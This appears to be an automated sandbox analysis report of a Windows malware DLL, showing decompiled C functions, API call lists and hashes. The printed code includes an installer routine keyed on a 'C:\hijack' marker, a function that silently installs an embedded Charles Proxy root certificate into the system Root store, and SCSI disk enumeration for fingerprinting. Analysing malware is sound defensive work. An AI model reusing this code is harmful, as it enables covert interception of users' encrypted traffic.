						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E10020180(_t82, _t100, _t102, __eflags); // executed
						_t115 = _t114 + 0x1c;
						_t62 = PathFileExistsA("C:\\hijack"); // executed
						__eflags = _t62;
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E10020180(_t82, _t100, _t102, __eflags); // executed
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "installp2");
							E1001FEA0(_t82, _t100, _t102, __eflags); // executed
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "installp2");
							E1001FDC0(_t82, _t100, _t102, __eflags); // executed
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E10020180(_t82, _t100, _t102, __eflags); // executed
						} else {
							E1001A0A0(); // executed
							_t75 = E1001A0B0(_t89); // executed
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D10();
								if(__eflags == 0) {
									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0); // executed
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A260(); // executed
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0");
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}











































                                                                                                                                                                          0x100204c0
                                                                                                                                                                          0x100204c0
                                                                                                                                                                          0x100204c0
                                                                                                                                                                          0x100204c3
                                                                                                                                                                          0x100204c5
                                                                                                                                                                          0x100204d0
                                                                                                                                                                          0x100204d1
                                                                                                                                                                          0x100204de
                                                                                                                                                                          0x100204df
                                                                                                                                                                          0x100204e4
                                                                                                                                                                          0x100204f9
                                                                                                                                                                          0x1002050f
                                                                                                                                                                          0x10020519
                                                                                                                                                                          0x10020521
                                                                                                                                                                          0x10020538
                                                                                                                                                                          0x1002053d
                                                                                                                                                                          0x10020540
                                                                                                                                                                          0x10020542
                                                                                                                                                                          0x1002057f
                                                                                                                                                                          0x10020584
                                                                                                                                                                          0x10020587
                                                                                                                                                                          0x10020589
                                                                                                                                                                          0x10020590
                                                                                                                                                                          0x100205a5
                                                                                                                                                                          0x100205b9
                                                                                                                                                                          0x100205d4
                                                                                                                                                                          0x100205d9
                                                                                                                                                                          0x100205ec
                                                                                                                                                                          0x100205f8
                                                                                                                                                                          0x100205fe
                                                                                                                                                                          0x10020605
                                                                                                                                                                          0x1002060d
                                                                                                                                                                          0x10020616
                                                                                                                                                                          0x1002061b
                                                                                                                                                                          0x1002061e
                                                                                                                                                                          0x10020620
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10020627
                                                                                                                                                                          0x10020639
                                                                                                                                                                          0x1002063e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10020640
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1002063e
                                                                                                                                                                          0x10020644
                                                                                                                                                                          0x10020662
                                                                                                                                                                          0x1002066a
                                                                                                                                                                          0x1002066d
                                                                                                                                                                          0x1002066f
                                                                                                                                                                          0x1002067f
                                                                                                                                                                          0x10020685
                                                                                                                                                                          0x1002068a
                                                                                                                                                                          0x10020692
                                                                                                                                                                          0x10020698
                                                                                                                                                                          0x1002069a
                                                                                                                                                                          0x100206d0
                                                                                                                                                                          0x100206d0
                                                                                                                                                                          0x100206d5
                                                                                                                                                                          0x100206e5
                                                                                                                                                                          0x100206eb
                                                                                                                                                                          0x100206f3
                                                                                                                                                                          0x100206f8
                                                                                                                                                                          0x10020708
                                                                                                                                                                          0x1002070e
                                                                                                                                                                          0x10020716
                                                                                                                                                                          0x1002071b
                                                                                                                                                                          0x1002072b
                                                                                                                                                                          0x10020731
                                                                                                                                                                          0x1002073e
                                                                                                                                                                          0x1002074e
                                                                                                                                                                          0x10020754
                                                                                                                                                                          0x1002069c
                                                                                                                                                                          0x1002069c
                                                                                                                                                                          0x100206a1
                                                                                                                                                                          0x100206a6
                                                                                                                                                                          0x100206a8
                                                                                                                                                                          0x100206b3
                                                                                                                                                                          0x100206aa
                                                                                                                                                                          0x100206af
                                                                                                                                                                          0x100206b1
                                                                                                                                                                          0x100206bf
                                                                                                                                                                          0x100206c4
                                                                                                                                                                          0x100206c7
                                                                                                                                                                          0x100206c9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100206cb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100206b1
                                                                                                                                                                          0x100206a8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1002058b
                                                                                                                                                                          0x1002075c
                                                                                                                                                                          0x10020761
                                                                                                                                                                          0x1002076b
                                                                                                                                                                          0x10020775
                                                                                                                                                                          0x1002077a
                                                                                                                                                                          0x10020544
                                                                                                                                                                          0x10020549
                                                                                                                                                                          0x10020551
                                                                                                                                                                          0x1002055b
                                                                                                                                                                          0x10020565
                                                                                                                                                                          0x1002056a
                                                                                                                                                                          0x1002056a
                                                                                                                                                                          0x10020783
                                                                                                                                                                          0x1002078e

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 100204F9
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                                            • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                            • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                            • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                                          • String ID: -0.3$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$installp2$installp2$installp2$status=check_debug$status=main_over$status=main_start
                                                                                                                                                                          • API String ID: 3079340674-624698304
                                                                                                                                                                          • Opcode ID: 8ae39e83437ea26eceefe112d98eb2762d5fc529021f9d4b598543daa85cb8fb
                                                                                                                                                                          • Instruction ID: c22925573318c8528c32417883aa4fd6f710712ddf5f47052043116b831c363f
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ae39e83437ea26eceefe112d98eb2762d5fc529021f9d4b598543daa85cb8fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 0951B2B5D04318ABEB20EBA4DC4BBDE7775DB10344F400194F90966182EB31BB84CFA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001F720, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177encryptionCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                          			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69); // executed
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root"); // executed
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0); // executed
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF20(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF20(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF20(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA30(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}






























                                                                                                                                                                          0x1001f720
                                                                                                                                                                          0x1001f720
                                                                                                                                                                          0x1001f720
                                                                                                                                                                          0x1001f729
                                                                                                                                                                          0x1001f730
                                                                                                                                                                          0x1001f737
                                                                                                                                                                          0x1001f73e
                                                                                                                                                                          0x1001f745
                                                                                                                                                                          0x1001f766
                                                                                                                                                                          0x1001f77a
                                                                                                                                                                          0x1001f77f
                                                                                                                                                                          0x1001f782
                                                                                                                                                                          0x1001f785
                                                                                                                                                                          0x1001f789
                                                                                                                                                                          0x1001f7a3
                                                                                                                                                                          0x1001f7a9
                                                                                                                                                                          0x1001f7b3
                                                                                                                                                                          0x1001f7b9
                                                                                                                                                                          0x1001f7bf
                                                                                                                                                                          0x1001f7c0
                                                                                                                                                                          0x1001f7c5
                                                                                                                                                                          0x1001f7cc
                                                                                                                                                                          0x1001f7e2
                                                                                                                                                                          0x1001f7e8
                                                                                                                                                                          0x1001f7ef
                                                                                                                                                                          0x1001f7f9
                                                                                                                                                                          0x1001f801
                                                                                                                                                                          0x1001f809
                                                                                                                                                                          0x1001f817
                                                                                                                                                                          0x1001f81d
                                                                                                                                                                          0x1001f822
                                                                                                                                                                          0x1001f828
                                                                                                                                                                          0x1001f82f
                                                                                                                                                                          0x1001f842
                                                                                                                                                                          0x1001f848
                                                                                                                                                                          0x1001f84c
                                                                                                                                                                          0x1001f859
                                                                                                                                                                          0x1001f85e
                                                                                                                                                                          0x1001f861
                                                                                                                                                                          0x1001f864
                                                                                                                                                                          0x1001f868
                                                                                                                                                                          0x1001f87b
                                                                                                                                                                          0x1001f891
                                                                                                                                                                          0x1001f897
                                                                                                                                                                          0x1001f8ac
                                                                                                                                                                          0x1001f8b4
                                                                                                                                                                          0x1001f8c9
                                                                                                                                                                          0x1001f8ce
                                                                                                                                                                          0x1001f8d1
                                                                                                                                                                          0x1001f8ec
                                                                                                                                                                          0x1001f8f2
                                                                                                                                                                          0x1001f8f5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001f91c
                                                                                                                                                                          0x1001f921
                                                                                                                                                                          0x1001f8e3
                                                                                                                                                                          0x1001f8e3
                                                                                                                                                                          0x1001f8e6
                                                                                                                                                                          0x1001f8e6
                                                                                                                                                                          0x1001f939
                                                                                                                                                                          0x1001f95d
                                                                                                                                                                          0x1001f963
                                                                                                                                                                          0x1001f964
                                                                                                                                                                          0x1001f969
                                                                                                                                                                          0x1001f868
                                                                                                                                                                          0x1001f84c
                                                                                                                                                                          0x1001f80b
                                                                                                                                                                          0x1001f80b
                                                                                                                                                                          0x1001f80b
                                                                                                                                                                          0x1001f972
                                                                                                                                                                          0x1001f972
                                                                                                                                                                          0x1001f97c
                                                                                                                                                                          0x1001f97c
                                                                                                                                                                          0x1001f7cc
                                                                                                                                                                          0x1001f789
                                                                                                                                                                          0x1001f988

                                                                                                                                                                          APIs
                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                                          • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                            • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                            • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                                          • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                                          • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                                          • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                                          • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                                          • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                                          • API String ID: 3311258246-1857994723
                                                                                                                                                                          • Opcode ID: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                                          • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ce81e6e7efad015fc66a7c972b9d95a9014d6efbbcb29acca2529cb5b9abefb
                                                                                                                                                                          • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001D560, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                          			E1001D560(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				void* _t79;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v32 = _t79;
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF20(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed
							if(_t87 == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CD70( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							FindCloseChangeNotification(_v32); // executed
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}


































                                                                                                                                                                          0x1001d560
                                                                                                                                                                          0x1001d569
                                                                                                                                                                          0x1001d570
                                                                                                                                                                          0x1001d57a
                                                                                                                                                                          0x1001d581
                                                                                                                                                                          0x1001d591
                                                                                                                                                                          0x1001d597
                                                                                                                                                                          0x1001d5b0
                                                                                                                                                                          0x1001d5b6
                                                                                                                                                                          0x1001d5bd
                                                                                                                                                                          0x1001d5c3
                                                                                                                                                                          0x1001d5ca
                                                                                                                                                                          0x1001d5e5
                                                                                                                                                                          0x1001d5ea
                                                                                                                                                                          0x1001d5ed
                                                                                                                                                                          0x1001d5f7
                                                                                                                                                                          0x1001d604
                                                                                                                                                                          0x1001d60a
                                                                                                                                                                          0x1001d614
                                                                                                                                                                          0x1001d61e
                                                                                                                                                                          0x1001d628
                                                                                                                                                                          0x1001d632
                                                                                                                                                                          0x1001d660
                                                                                                                                                                          0x1001d668
                                                                                                                                                                          0x1001d76e
                                                                                                                                                                          0x1001d775
                                                                                                                                                                          0x1001d78d
                                                                                                                                                                          0x1001d777
                                                                                                                                                                          0x1001d780
                                                                                                                                                                          0x1001d786
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d788
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d788
                                                                                                                                                                          0x1001d786
                                                                                                                                                                          0x1001d67d
                                                                                                                                                                          0x1001d67d
                                                                                                                                                                          0x1001d684
                                                                                                                                                                          0x1001d692
                                                                                                                                                                          0x1001d69f
                                                                                                                                                                          0x1001d6a2
                                                                                                                                                                          0x1001d6b2
                                                                                                                                                                          0x1001d6b7
                                                                                                                                                                          0x1001d6ba
                                                                                                                                                                          0x1001d6bd
                                                                                                                                                                          0x1001d6c7
                                                                                                                                                                          0x1001d6d1
                                                                                                                                                                          0x1001d6dd
                                                                                                                                                                          0x1001d6e3
                                                                                                                                                                          0x1001d6fa
                                                                                                                                                                          0x1001d709
                                                                                                                                                                          0x1001d719
                                                                                                                                                                          0x1001d724
                                                                                                                                                                          0x1001d72d
                                                                                                                                                                          0x1001d730
                                                                                                                                                                          0x1001d733
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d735
                                                                                                                                                                          0x1001d741
                                                                                                                                                                          0x1001d74a
                                                                                                                                                                          0x1001d750
                                                                                                                                                                          0x1001d750
                                                                                                                                                                          0x1001d70b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d70b
                                                                                                                                                                          0x1001d75a
                                                                                                                                                                          0x1001d760
                                                                                                                                                                          0x1001d76a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d76c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d76c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d76a
                                                                                                                                                                          0x1001d73d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d73f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d73d
                                                                                                                                                                          0x1001d79e
                                                                                                                                                                          0x1001d7a2
                                                                                                                                                                          0x1001d7ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d7ab
                                                                                                                                                                          0x1001d794
                                                                                                                                                                          0x1001d794
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d794
                                                                                                                                                                          0x1001d7ae
                                                                                                                                                                          0x1001d7b4
                                                                                                                                                                          0x1001d7ba
                                                                                                                                                                          0x1001d7bd
                                                                                                                                                                          0x1001d7d0

                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                                          • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                                          • DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D660
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D7A2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
                                                                                                                                                                          • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                                          • API String ID: 2954624657-153650326
                                                                                                                                                                          • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                                          • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
